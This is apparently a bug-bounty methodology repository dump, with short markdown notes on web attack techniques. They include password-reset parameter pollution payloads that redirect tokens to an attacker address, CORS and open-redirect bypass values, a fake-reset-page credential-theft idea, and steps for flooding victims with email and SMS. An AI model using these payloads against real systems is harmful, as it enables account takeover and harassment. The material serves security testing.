├── CheckList ├── mindmap.png ├── Web_Checklist_by_Chintan_Gurjar.pdf ├── Web_Penetration_Testing_Methodology@2x.png └── Web_Application_Penetration_Testing_Checklist_by_Tushar_Verma.pdf ├── Subdomain_Takeover ├── dns.png ├── cname.png ├── cname_buy.png ├── subdomain_takeover.png ├── Easy_Methods.md ├── Subdomain_Takeover.md └── Sub_or_top_level_domain_takeover.md ├── Sign_Up_Functionality ├── Signup_Mindmap.png └── Hunting_for_bugs_in_signup_feature.md ├── CMS ├── Moodle.md ├── Drupal.md ├── AEM.md └── wordpress.md ├── Authentication_Bypass ├── account_ban_bypass.md ├── OTP_Bypass.md └── 2FA_Bypasses.md ├── Password_Reset_Functionality ├── Account_Takeover_By_Password_Reset_Functionality.md ├── README.md ├── Password_Reset_Token_Leakage.md ├── Password_Reset_Flaws_by_Sm4rty.md └── Top_5_Password_Reset_Bugs ├── OAuth ├── README.md └── OAuth 2.0 Hunting Methodology.md ├── Rate_limit ├── No Rate-limit on Promo.md ├── No Rate-Limit on Verify-PhoneNo.md ├── No Rate-limit on Verify-email.md ├── No Rate-limit on forget-password.md ├── No Rate-limit on Invite User.md ├── README.md └── RateLimitBypass.md ├── SSTI └── SSTI.md ├── Sensitive_Info_Leaks ├── Shodan_cve_dorks.md ├── Version_Leak.md ├── Github_Recon_Method.md ├── Google_Dorks.md └── Github-dorks.md ├── MFA_Bypasses ├── README.md └── 2FA_Bypass.md ├── CONTRIBUTING.md ├── JIRA └── README.md ├── CORS ├── CORS_Bypasses.md └── CORS.md ├── .github └── FUNDING.yml ├── CSRF ├── README.md └── Cross_Site_Request_Forgery_Bypass.md ├── Open_Redirection ├── Open_Redirection_Bypass.md └── find_OpenRedirect_trick.md ├── XXE ├── XXE_Methods.md └── Billion_Laugh_Attack.md ├── HTML_Injection └── HTML_Injection_on_password_reset_page.md ├── CVES └── easycve.md ├── Parameter_Pollution └── Parameter_Pollution_in_social_sharing_buttons.md ├── EXIF_Geo_Data_Not_Stripped └── exif_geo.md ├── SSRF ├── Blind_SSRF.md └── SSRF-old.md ├── Status_Code_Bypass ├── README.md └── 403Bypass.md ├── API_Testing ├── Reverse_Engineer_an_API.md └── Hidden_API_Functionality_Exposure.md ├── Weak_Password_Policy └── Weak_password_policy.md ├── BrokenLinkHijacking └── BrokenLinkHijacking.md ├── Misconfigurations ├── Default_Credential_And_Admin_Panel.md ├── S3-Bucket_Misconfig.md └── Docker.md ├── Tabnabbing └── Tabnabbing.md ├── Host-Header └── Host-Header.md ├── Recon ├── Workflow.md ├── subdomain_enumeration.md └── Github_Dorking.md ├── GraphQL └── GraphQL.md ├── XSS ├── XSS_Bypass.md ├── Automated_XSS.md ├── post_message_xss.md ├── Bypass_CSP.md └── Xss.md ├── File_Upload └── old_file_upload_bypass.md ├── Account_Takeovers_Methodologies └── Account_Takeovers_Methods.md ├── HTTP_Desync └── http_desync.md ├── CODE_OF_CONDUCT.md ├── Application_Level_DoS └── ALD_Methods.md ├── JWT └── OLD_JWT_ATTACK_Notes.md ├── Web_Source_Review └── codereviewtips.md ├── IDOR └── IDOR-Old.md ├── FindOriginIP └── FindOrigin.md ├── WAF_Bypasses └── WAF_Bypass_Using_headers.md ├── Broken_Auth_And_Session_Management └── Session_based_bugs.md ├── SQLi └── SQL_Injection.md ├── SUMMARY.md └── Race_Condition └── race_conditions.md /CheckList/mindmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/CheckList/mindmap.png -------------------------------------------------------------------------------- /Subdomain_Takeover/dns.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/Subdomain_Takeover/dns.png -------------------------------------------------------------------------------- /Subdomain_Takeover/cname.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/Subdomain_Takeover/cname.png -------------------------------------------------------------------------------- /Subdomain_Takeover/cname_buy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/Subdomain_Takeover/cname_buy.png -------------------------------------------------------------------------------- /Sign_Up_Functionality/Signup_Mindmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/Sign_Up_Functionality/Signup_Mindmap.png -------------------------------------------------------------------------------- /Subdomain_Takeover/subdomain_takeover.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/Subdomain_Takeover/subdomain_takeover.png -------------------------------------------------------------------------------- /CheckList/Web_Checklist_by_Chintan_Gurjar.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf -------------------------------------------------------------------------------- /CheckList/Web_Penetration_Testing_Methodology@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/CheckList/Web_Penetration_Testing_Methodology@2x.png -------------------------------------------------------------------------------- /CheckList/Web_Application_Penetration_Testing_Checklist_by_Tushar_Verma.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/attacker-codeninja/HowToHunt/HEAD/CheckList/Web_Application_Penetration_Testing_Checklist_by_Tushar_Verma.pdf -------------------------------------------------------------------------------- /CMS/Moodle.md: -------------------------------------------------------------------------------- 1 | ## Mass Hunting XSS — Moodle 2 | * [https://dewangpanchal98.medium.com/mass-hunting-xss-moodle-ed4b50c82516](https://dewangpanchal98.medium.com/mass-hunting-xss-moodle-ed4b50c82516) 3 | 4 | ## Author: 5 | [@th3.d1p4k](https://twitter.com/DipakPanchal05) 6 | -------------------------------------------------------------------------------- /Authentication_Bypass/account_ban_bypass.md: -------------------------------------------------------------------------------- 1 | ### How to bypass account ban 2 | 3 | Steps: 4 | ``` 5 | If you got ban from xyz.com try to see other domain like forms etc where you need the same account to login. 6 | you maybe able to login from forms.xyz.com and its a bypass I found it on a hackerone private program. 7 | ``` 8 | -------------------------------------------------------------------------------- /CMS/Drupal.md: -------------------------------------------------------------------------------- 1 | ## Drupal Nodes 2 | 3 | Tips: 4 | ``` 5 | If you hunt on a Drupal website: fuzz with intruder on '/node/$' where '$' is a number (from 1 to 500 for example). 6 | You could find hidden pages (test, dev) which are not referenced by the search engines. 7 | ``` 8 | 9 | * [adrien_jeanneau](https://twitter.com/adrien_jeanneau/status/1273952564430725123?t=SUinUf09jxjRXu1yF9AQDg&s=19) 10 | -------------------------------------------------------------------------------- /Password_Reset_Functionality/Account_Takeover_By_Password_Reset_Functionality.md: -------------------------------------------------------------------------------- 1 | 2 | ``` 3 | 1. email= victim@gmail.com&email=attacker@gmil.com 4 | 2. email= victim@gmail.com%20email=attacker@gmil.com 5 | 3. email= victim@gmail.com |email=attacker@gmil.com 6 | 4. email= victim@gmail.com%0d%0acc:attacker@gmil.com 7 | 5. email= victim@gmail.com&code= my password reset token 8 | ``` 9 | ### Authors 10 | 11 | @tamimhasan404 12 | -------------------------------------------------------------------------------- /Password_Reset_Functionality/README.md: -------------------------------------------------------------------------------- 1 | # Password Reset Mindmap 2 | ![https://pbs.twimg.com/media/EhN29bpU8AMvLxx?format=jpg&name=medium](https://pbs.twimg.com/media/EhN29bpU8AMvLxx?format=jpg&name=medium) 3 | 4 | # Source 5 | * [Twitter](https://twitter.com/N008x/status/1302515523557548032/photo/1) 6 | * [Blog](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) 7 | # Authors 8 | * [KathanP19](https://twitter.com/KathanP19) 9 | -------------------------------------------------------------------------------- /OAuth/README.md: -------------------------------------------------------------------------------- 1 | # Some MindMap 2 | --- 3 | ### OAuth by Hack3rSr0lls 4 | ![https://pbs.twimg.com/media/EZ1WqmcXYAAqwSH?format=jpg&name=900x900](https://pbs.twimg.com/media/EZ1WqmcXYAAqwSH?format=jpg&name=900x900) 5 | 6 | ### Source 7 | * [https://twitter.com/hackerscrolls/status/1269266750467649538](https://twitter.com/hackerscrolls/status/1269266750467649538) 8 | 9 | ### Author 10 | * [KathanP19](https://twitter.com/KathanP19) 11 | -------------------------------------------------------------------------------- /Rate_limit/No Rate-limit on Promo.md: -------------------------------------------------------------------------------- 1 | ## No Rate-Limit on Promo 2 | 3 | ### Steps To Reproduce: 4 | - 1) Go to URL - `https://abc.target.com/product/121/checkout/promo` 5 | - 2) Navigate to `Offer/Promo/Coupon code` option 6 | - 3) Enter the random digit 7 | - 4) `Intercept the Request` and Send to intruder 8 | - 5) Apply payload & `Start attack` 9 | 10 | ### Impact : 11 | - Financial Loss, an attacker can easily bruteforce all promo/coupon/Offer codes. -------------------------------------------------------------------------------- /SSTI/SSTI.md: -------------------------------------------------------------------------------- 1 | # Some MindMaps 2 | --- 3 | ### SSTI Finding Attack Vector by @what_web 4 | ![https://pbs.twimg.com/media/EnwZh7qXcAEB3wu?format=jpg&name=large](https://pbs.twimg.com/media/EnwZh7qXcAEB3wu?format=jpg&name=large) 5 | 6 | ### Source 7 | * [https://twitter.com/jae_hak99/status/1331967876417327104?s=20](https://twitter.com/jae_hak99/status/1331967876417327104?s=20) 8 | 9 | ### Tools 10 | + [tplmap](https://github.com/epinna/tplmap) 11 | ### Author 12 | * [0xsunil](https://twitter.com/0xsunil) 13 | -------------------------------------------------------------------------------- /Sensitive_Info_Leaks/Shodan_cve_dorks.md: -------------------------------------------------------------------------------- 1 | ## CVE's Shodan Dorks. 2 | 3 | * Big IP shodan Search:- 4 | 5 | `http.title:"BIG-IP®-Redirect" org:Org` 6 | 7 | * CVE 2020-3452 8 | 9 | ` http.html_hash:-628873716 10 | “set-cookie: webvpn;”` 11 | 12 | * CVE CVE-2019-11510 13 | 14 | `http.html:/dana-na/` 15 | 16 | * CVE-2020–5902 17 | 18 | ```inurl:/tmui/login.jsp``` 19 | 20 | 21 | ## Author: 22 | - [@manasH4rsh](https://twitter.com/manasH4rsh) 23 | - [Fani Malik](https://twitter.com/FaniMalikHack) 24 | -------------------------------------------------------------------------------- /CMS/AEM.md: -------------------------------------------------------------------------------- 1 | ## Adobe Experience Manager 2 | 3 | ### Tools 4 | + [aem-hacker](https://github.com/0ang3el/aem-hacker) 5 | + [aemscan](https://github.com/Raz0r/aemscan) 6 | 7 | ### Wordlist for fuzzing 8 | + [aem.txt](https://raw.githubusercontent.com/clarkvoss/AEM-List/main/paths) 9 | 10 | ### Resources 11 | + [Approaching AEM](https://www.bugcrowd.com/resources/webinar/aem-hacker-approaching-adobe-experience-manager-web-apps/) 12 | + [Securing AEM](https://www.slideshare.net/0ang3el/securing-aem-webapps-by-hacking-them) 13 | -------------------------------------------------------------------------------- /MFA_Bypasses/README.md: -------------------------------------------------------------------------------- 1 | # Some MindMaps 2 | --- 3 | ### 2FA Bypass by Hack3rScr0lls 4 | ![https://pbs.twimg.com/media/EW8vBWEX0AAxcVj?format=jpg&name=small](https://pbs.twimg.com/media/EW8vBWEX0AAxcVj?format=jpg&name=small) 5 | 6 | ### Source 7 | * [https://twitter.com/hackerscrolls/status/1256276376019230720](https://twitter.com/hackerscrolls/status/1256276376019230720) 8 | 9 | ### 2FA Bypass by Harshbothra 10 | * [MindMap](https://www.mindmeister.com/1736437018?t=SEeZOmvt01) 11 | 12 | ### Author 13 | * [KathanP19](https://twitter.com/KathanP19) 14 | -------------------------------------------------------------------------------- /Password_Reset_Functionality/Password_Reset_Token_Leakage.md: -------------------------------------------------------------------------------- 1 | Password Reset Token Leakage 2 | 3 | Steps: 4 | 1.Sent a password reset request using forget password 5 | 2.Check your email 6 | 3.copy your reset page link and paste in another tab and make burp intercept on. 7 | 4.Look for every request if you find similiar token that is in reset link with other domain like: bat.bing.com or facebook.com 8 | 5.Than there is reset password token leakage. 9 | 10 | ### Authors 11 | 12 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter) 13 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | ## Contributing 2 | 3 | If you have any ideas for things we should include, please use ONE of the following methods to submit them: 4 | 5 | * Send us pull requests 6 | * Create an issue in the project (with links, and we'll parse and incorporate them) 7 | * Message us on twitter `https://twitter.com/KathanP19` or `https://twitter.com/remonsec` with content to add. 8 | 9 | Significant effort is made to give attribution for these content whenever possible, and if you are a content owner or know who the original author/curator is, please let us know so we can give proper credit. 10 | -------------------------------------------------------------------------------- /Sensitive_Info_Leaks/Version_Leak.md: -------------------------------------------------------------------------------- 1 | # Version Leak 2 | 3 | ``` 4 | step1. go to the target says- https://redacted.com 5 | step2. open view page source 6 | step3. check for path, directories 7 | step4. go that path says- https://redacted.com/theme/css/file.css 8 | step5. try to visit all directories and check it is accessible or not. 9 | step5. if it is give 403 10 | step6. add %0, %m, %2e, says- https://redacted.com/%0theme and then check the response, it will show the running server name, and version information. 11 | ``` 12 | - And check for also css path url, sometime it contain some path. 13 | -------------------------------------------------------------------------------- /JIRA/README.md: -------------------------------------------------------------------------------- 1 | 2 | ## Blogs 3 | - Jira vulnerabilities and how they are exploited in the wild - [thehackerish Blog](https://thehackerish.com/jira-vulnerabilities-and-how-they-are-exploited-in-the-wild/) 4 | 5 | 6 | # Tools 7 | - [Jira-Lens](https://github.com/MayankPandey01/Jira-Lens) [Jira-Lens 🔍 is a Python Based vulnerability Scanner for JIRA.This tool Performs 25+ Checks including CVE's and Multiple Disclosures on the Provided JIRA Instance] 8 | 9 | 10 | # Author 11 | **Name:** Mayank Pandey 12 | 13 | **Handle:** [@mayank_pandey01](https://twitter.com/mayank_pandey01) 14 | 15 | -------------------------------------------------------------------------------- /CORS/CORS_Bypasses.md: -------------------------------------------------------------------------------- 1 | # CORS Bypass 2 | 1. `Origin:null` 3 | 2. `Origin:attacker.com` 4 | 3. `Origin:attacker.target.com` 5 | 4. `Origin:attackertarget.com` 6 | 5. `Origin:sub.attackertarget.com` 7 | 6. `Origin:attacker.com and then change the method Get to post/Post to Get` 8 | 7. `Origin:sub.attacker target.com` 9 | 8. `Origin:sub.attacker%target.com` 10 | 9. `Origin:attacker.com/target.com` 11 | 12 | ### Authors 13 | 14 | * [@tamimhasan404](https://twitter.com/tamimhasan404) 15 | 16 | # Reference Tweets 17 | https://twitter.com/trbughunters/status/1287023673845612546 18 | 19 | https://twitter.com/Paresh_parmar1/status/1265251507655630848 20 | 21 | https://twitter.com/Alra3ees/status/1141504347089584128 22 | -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | custom: ['https://www.buymeacoffee.com/kathanp19'] 13 | -------------------------------------------------------------------------------- /CSRF/README.md: -------------------------------------------------------------------------------- 1 | # Some MindMap 2 | --- 3 | ### 6 CSRF Bypass by Hack3rSr0lls 4 | ![https://pbs.twimg.com/media/EY70bxkWkAAFzGb?format=jpg&name=900x900](https://pbs.twimg.com/media/EY70bxkWkAAFzGb?format=jpg&name=900x900) 5 | 6 | ### CSRF Mindmap 7 | ![https://gblobscdn.gitbook.com/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-LrAtLpniLVMCWL-CVF-%2F-LrAtNhzv9bhi7vB_zs7%2Fimage.png?alt=media&token=ead94d04-f31d-4d99-9087-9bf92d091b0b](https://gblobscdn.gitbook.com/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-LrAtLpniLVMCWL-CVF-%2F-LrAtNhzv9bhi7vB_zs7%2Fimage.png?alt=media&token=ead94d04-f31d-4d99-9087-9bf92d091b0b) 8 | 9 | ### Source 10 | * [https://twitter.com/hackerscrolls/status/1265217322308046849](https://twitter.com/hackerscrolls/status/1265217322308046849) 11 | 12 | ### Author 13 | * [KathanP19](https://twitter.com/KathanP19) 14 | -------------------------------------------------------------------------------- /Open_Redirection/Open_Redirection_Bypass.md: -------------------------------------------------------------------------------- 1 | # Open Redirection Bypass Trick: 2 | 3 | This bypass I found in a application while I doing pentesting. I hope it will helps you too! 4 | 5 | 1. While you I trying to redirect https://targetweb.com?url=http://attackersite.com it did not redirected! 6 | 2. I Created a new subdomain with with www.targetweb.com.attackersite.com 7 | 3. And when I tried to redirect with https://targetweb.com?url=www.targetweb.com.attackersite.com 8 | 4. It will successfully redirected to the www.targetweb.com.attackersite.com website! 9 | 5. Due to the bad regex it has been successfully bypass their protection! 10 | 11 | ### Authors: 12 | * [@bishal0x01](https://twitter.com/bishal0x01) 13 | 14 | ### Reference Tweets: 15 | * https://twitter.com/bishal0x01/status/1262021038080053248 16 | -------------------------------------------------------------------------------- /XXE/XXE_Methods.md: -------------------------------------------------------------------------------- 1 | # XML External Entities. 2 | These are my methods to check and hunt for XML External Entities. 3 | I might be missing a lot of things but as the community believe in "sharing is caring" by @CXVVMVII. 4 | 5 | ## Methods 6 | 1. Convert the content type from "application/json"/"application/x-www-form-urlencoded" to "applcation/xml". 7 | 2. File Uploads allows for docx/xlcs/pdf/zip , unzip the package and add your evil xml code into the xml files. 8 | 3. If svg allowed in picture upload , you can inject xml in svgs. 9 | 4. If the web app offers RSS feeds , add your milicious code into the RSS. 10 | 5. Fuzz for /soap api , some applications still running soap apis 11 | 6. If the target web app allows for SSO integration, you can inject your milicious xml code in the SAML request/reponse 12 | 13 | ## Twitter: 14 | * [whitechaitai](https://twitter.com/whitechaitai) 15 | -------------------------------------------------------------------------------- /Rate_limit/No Rate-Limit on Verify-PhoneNo.md: -------------------------------------------------------------------------------- 1 | ## Flaw-Name : Unlimited SMS Triggering 2 | --- 3 | ### Steps To Reproduce 4 | - 1 - Open this url `https://target.com/phone-number-verify` 5 | - 2 - Enter the `victim's mob. number` 6 | - 3 - `Intercept the request` and send the request to intruder 7 | - 4 - Use payload type as `NULL payloads` and set the payload count & `start attack` 8 | --- 9 | ### Impact : 10 | - If the company is using any email service software API(such as AWS,GCP..etc) or some tool that has been bought for the emails being sent on the support domain, the rate limit can result in `financial loss` and it can also `slow down your services` as huge/mass mails will `lead to disruption of data` that original user might send or the quota that has been bought might be exhausted. 11 | --- 12 | ### Mitigation - 13 | 14 | - 1 - IP Based Blocking 15 | - 2 - Captcha 16 | - 3 - Firewall 17 | - 4 - Reducing the number of API requests 18 | -------------------------------------------------------------------------------- /Rate_limit/No Rate-limit on Verify-email.md: -------------------------------------------------------------------------------- 1 | ## Flaw-Name : Unlimited Email Triggering 2 | --- 3 | ### Steps To Reproduce : 4 | - 1 - Navigate to : `https://abc.target.com/verify-email` 5 | - 2 - `Intercept` the request in BurpSuite 6 | - 3 - Send the request to `Intruder` and clear the payload position 7 | - 4 - Use `Null payloads` as payload type and set the payload count to 100 8 | - 5 - `Start attack` 9 | 10 | --- 11 | ### Impact : 12 | - If the company is using any email service software API or some tool that has been bought for the emails being sent on the support domain, the rate limit can result in `financial loss` and it can also `slow down your services` as huge/mass mails will `lead to disruption of data` that original user might send or the quota that has been bought might be exhausted. 13 | --- 14 | ### Mitigation : 15 | 16 | - 1 - IP Based Blocking 17 | - 2 - Captcha 18 | - 3 - Firewall 19 | - 4 - Reducing the number of API requests 20 | -------------------------------------------------------------------------------- /HTML_Injection/HTML_Injection_on_password_reset_page.md: -------------------------------------------------------------------------------- 1 | 2 | ## Summary 3 | Password reset links are usually addressed to your account name followed by the reset link. Also if the application allows 4 | you to have your account name with tags and special characters then you should try this. 5 | 6 | ### Steps 7 | 8 | 1. Create your account 9 | 2. Edit your name to `

attacker

` or `"abc>

attacker

` and save it. 10 | 3. Request for a reset password and check your email. 11 | 4. You will notice the `

` tag getting executed 12 | 13 | * HTML injection are usually considered as low to medium severity bugs but you can escalate the severity by serving a 14 | malicious link by using `` for eg: `

attacker

` 15 | 16 | * You can redirect the user to your malicious domain and serve a fake reset password page to steal credentials 17 | Also you can serve a previously found XSS page and steal user cookies etc etc.. The creativity lies on you.. 18 | 19 | ## Author 20 | [@C1pher15](https://twitter.com/C1pher15) 21 | -------------------------------------------------------------------------------- /Rate_limit/No Rate-limit on forget-password.md: -------------------------------------------------------------------------------- 1 | ## Flaw-Name : No rate limit on forget/reset password leads to email triggering 2 | --- 3 | ### Steps To Reproduce 4 | - 1 - Navigate to : `https://abc.target.com/forgot-password` or it could be `https://abc.target.com/reset-password` 5 | - 2 - Enter the email of the victim 6 | - 3 - `Intercept` the request in burp suite 7 | - 4 - Send the request to the `Intruder` and clear payload positions 8 | - 5 - Use `Null payloads` and set the payload count to 100 9 | - 6 - `Start attack` 10 | 11 | 12 | --- 13 | ### Impact : 14 | - If the company is using any email service software API or some tool that has been bought for the emails being sent on the support domain, the rate limit can result in `financial loss` and it can also `slow down your services` as huge/mass mails will `lead to disruption of data` that original user might send or the quota that has been bought might be exhausted. 15 | --- 16 | ### Mitigation : 17 | 18 | - 1 - IP Based Blocking 19 | - 2 - Captcha 20 | - 3 - Firewall 21 | - 4 - Reducing the number of API requests -------------------------------------------------------------------------------- /CVES/easycve.md: -------------------------------------------------------------------------------- 1 | # Easy CVES using Researching 2 | 3 | ### Tools 4 | * Google 5 | * Twitter 6 | * Nuclei 7 | 8 | ## Steps: 9 | ``` 10 | 1.Grab all the subdomains i.e, subfinder -d domain.com | tee -a domains.txt 11 | 2.Grap all alive domains i.e, cat domains.txt | httpx -status-code | grep 200 | cut -d " " -f1 | tee -a alive.txt 12 | 3.Run nuclei basic-detection,panels,workflows,cves templates differently and store results in different file. i.e, cat alive.txt | nuclei -t nuclei-templates/workflows | tee -a workflows. 13 | 4.Read each output carefully with patience. 14 | 5.Find interest tech used by target. i.e, jira 15 | 6.put that link into browser check the version used by target. 16 | 7.Go on google search with jira version exploit. 17 | 8.grep the cves 18 | 9.Go to twitter in explore tab search CVE(that you found from google) poc or CVE exploit 19 | 10.Go to google and put cve or some details grab from twitter for a better poc read writeups related to that. 20 | 11.Try all cves if success report it.:) 21 | ``` 22 | 23 | ### Authors 24 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter) 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /Parameter_Pollution/Parameter_Pollution_in_social_sharing_buttons.md: -------------------------------------------------------------------------------- 1 | # Parameter Pollution in social sharing buttons 2 | 3 | Hi Guys, 4 | Though it is not severe bug.But still some organizations take this seriously. 5 | 6 | ## Steps : 7 | 8 | ``` 9 | 1.Browse through your target. 10 | say https://target.com 11 | 2.Find a article or blog present on target website which must have a link to share that blog on different social networks such as 12 | Facebook,Twitter etc. 13 | 3.Let's say we got and article with url: 14 | https://taget.com/how-to-hunt 15 | then just appened it with payload ?&u=https://attacker.com/vaya&text=another_site:https://attacker.com/vaya 16 | so our url will become 17 | https://taget.com/how-to-hunt?&u=https://attacker.com/vaya&text=another_site:https://attacker.com/vaya 18 | 4.Now hit enter with the abover url and just click on share with social media. 19 | Just observe the content if it is including our payload i.e. https://attacker.com 20 | Then it is vulnerable or else try next target. 21 | ``` 22 | ## References: 23 | * https://hackerone.com/reports/105953 24 | * Google 25 | 26 | ## Author 27 | * [KenAdams000](https://twitter.com/KenAdams000) 28 | -------------------------------------------------------------------------------- /EXIF_Geo_Data_Not_Stripped/exif_geo.md: -------------------------------------------------------------------------------- 1 |

Summary:

2 | When a user uploads an image in example.com, the uploaded image’s EXIF Geolocation Data does not gets stripped. As a result, anyone can get sensitive information of example.com users like their Geolocation, their Device information like Device Name, Version, Software & Software version used etc. 3 | 4 |

Steps to reproduce:

5 | 6 | 1. Got to Github ( https://github.com/ianare/exif-samples/tree/master/jpg)
7 | 2. There are lot of images having resolutions (i.e 1280 * 720 ) , and also whith different MB’s .
8 | 3. Go to Upload option on the website
9 | 4. Upload the image
10 | 5. see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect , edit it as html )
11 | 6. open it (http://exif.regex.info/exif.cgi)
12 | 7. See wheather is that still showing exif data , if it is then Report it. 13 | 14 | # Reports (Hackerone) 15 | 16 | - [IDOR with Geolocation data not stripped from images](https://hackerone.com/reports/906907) 17 | 18 | # Author 19 | * [@0xd3vil](https://twitter.com/0xd3vil) 20 | * [@klaus](https://twitter.com/klaus_dev) 21 | -------------------------------------------------------------------------------- /SSRF/Blind_SSRF.md: -------------------------------------------------------------------------------- 1 | # Blind SSRF 2 | Blind SSRF's are those that don't show enumerated data directly to the user and hence are known as blind SSRF. 3 | 4 | ## Different Methods: 5 | 6 | ### Methodology #1: 7 | **Header** **Injection**: 8 | 9 | One way of finding them is by inserting your burp collaborator domain into the referrer header also known as host header injection. 10 | 11 | Snippet: 12 | ``` 13 | GET /HTTP 1.1 14 | Host: site.tld 15 | User Agent: Firefox 16 | Referrer: https://your_collaborator_instance.com 17 | 18 | ``` 19 | 20 | 21 | Many organizations use services that analyse which url or service is referring the visitor to their site. Execution of this type of attack depends upon the underlying service in my case the server was running on an aws ec2 instance but i was unable to get to it's admin panel namely (192.168.192.168) as it was only performing a lookup on me but not allowing anythng beyond that. Try it on different sites and services that you come across you just might get lucky. 22 | 23 | I will list more as i find if you have found any please kindly list them here so that other's beneift from it. 24 | 25 | ### Contributor: 26 | * [@cowlingbanana](https://github.com/cowlingbanana) 27 | 28 | -------------------------------------------------------------------------------- /Status_Code_Bypass/README.md: -------------------------------------------------------------------------------- 1 | # Some Mind Maps 2 | -------- 3 | ### 403 Mindmap 4 | ![https://pbs.twimg.com/media/EWmW9-tWkAA4vLs?format=jpg&name=900x900](https://pbs.twimg.com/media/EWmW9-tWkAA4vLs?format=jpg&name=900x900) 5 | 6 | ### Source 7 | * [https://twitter.com/hackerscrolls/status/1254701239360720900](https://twitter.com/hackerscrolls/status/1254701239360720900) 8 | --- 9 | ### Few Twitter Tips 10 | ![https://pbs.twimg.com/media/EheFZJvVgAEuzZ1?format=png&name=small](https://pbs.twimg.com/media/EheFZJvVgAEuzZ1?format=png&name=small) 11 | * [https://twitter.com/iam_j0ker/status/1303658167205728256](https://twitter.com/iam_j0ker/status/1303658167205728256) 12 | --- 13 | ### Few More Twitter Tips 14 | ![https://pbs.twimg.com/media/EkezB9QW0AAKa-Y?format=jpg&name=medium](https://pbs.twimg.com/media/EkezB9QW0AAKa-Y?format=jpg&name=medium) 15 | ![https://pbs.twimg.com/media/EkezB9VXUAYttBU?format=jpg&name=large](https://pbs.twimg.com/media/EkezB9VXUAYttBU?format=jpg&name=large) 16 | ![https://pbs.twimg.com/media/EkezB9LX0AA8DET?format=jpg&name=large](https://pbs.twimg.com/media/EkezB9LX0AA8DET?format=jpg&name=large) 17 | * [https://twitter.com/h4x0r_dz/status/1317218511937261570](https://twitter.com/h4x0r_dz/status/1317218511937261570) 18 | --- 19 | ### Author 20 | * [KathanP19](https://twitter.com/KathanP19) 21 | -------------------------------------------------------------------------------- /API_Testing/Reverse_Engineer_an_API.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineer an API 2 | 3 | 4 | ## Tools to use 5 | 1. FoxyProxy 6 | 2. mitmweb 7 | 3. mitmproxy2swagger 8 | 4. https://editor.swagger.io/ 9 | 5. Postman 10 | 11 | ## Steps to Reproduce 12 | 1. **Foxyproxy:** Turn on 8080 port using Foxy Proxy.(Label it anything you want) 13 | 2. **mitmweb:** Run `sudo mitmweb` and then go to mitm.it and install & import the certificate. 14 | 3. **Explore Website w/ API's functionalities:** Go to the website w/ api that you want to gather the API endpoints from and explore it's functionalities.
The mitmweb tool will capture it, 15 | afterwards you can download the captures as a flow file in mitmweb by clicking on file -> save all. 16 | 4. **mitmproxy2swagger:** Here we run `sudo mitmproxy2swagger -i flows -o spec.yml -p -f flow`. This will turn flows file to a yml file. Afterwards you need to remove the ignore: in the spec.yml and run 17 | `sudo mitmproxy2swagger -i flows -o spec.yml -p -f flow --examples`, --examples is added to enhance the documentation of the api endpoints. 18 | 5. **https://editor.swagger.io/:** Now you can import the clean spec.yml file and visualize the different endpoints. 19 | 6. **Postman:** You can also import the spec.yml in postman which will produce a well organized collection. 20 | -------------------------------------------------------------------------------- /Rate_limit/No Rate-limit on Invite User.md: -------------------------------------------------------------------------------- 1 | ## Flaw-Name : No rate limit on invite user leads to email triggering 2 | --- 3 | 4 | ### Description : 5 | - Rate limiting is a strategy for limiting network traffic. It puts a cap on how often someone can repeat an action within a certain timeframe – for instance, trying to log in to an account. 6 | 7 | --- 8 | ### Steps To Reproduce 9 | - 1 - Go to `https://target.com/` 10 | - 2 - Navigate to `Invite User` option and Enter the `victim's email` 11 | - 3 - Send invite & `Intercept` the Request 12 | - 4 - Send the request to `Intruder` & clear payload positions 13 | - 5 - Apply payload type as `null payload` and payload count as 100 14 | - 5 - Click on `Start attack` after applying the threads 15 | - 6 - The victim will get huge number of emails 16 | --- 17 | ### Impact : 18 | - If the company is using any email service software API(such as AWS,GCP..etc) or some tool that has been bought for the emails being sent on the support domain, the rate limit can result in `financial loss` and it can also `slow down your services` as huge/mass mails will `lead to disruption of data` that original user might send or the quota that has been bought might be exhausted. 19 | --- 20 | ### Mitigation - 21 | 22 | - 1 - IP Based Blocking 23 | - 2 - Captcha 24 | - 3 - Firewall 25 | - 4 - Reducing the number of API requests 26 | -------------------------------------------------------------------------------- /Weak_Password_Policy/Weak_password_policy.md: -------------------------------------------------------------------------------- 1 |

Summary:

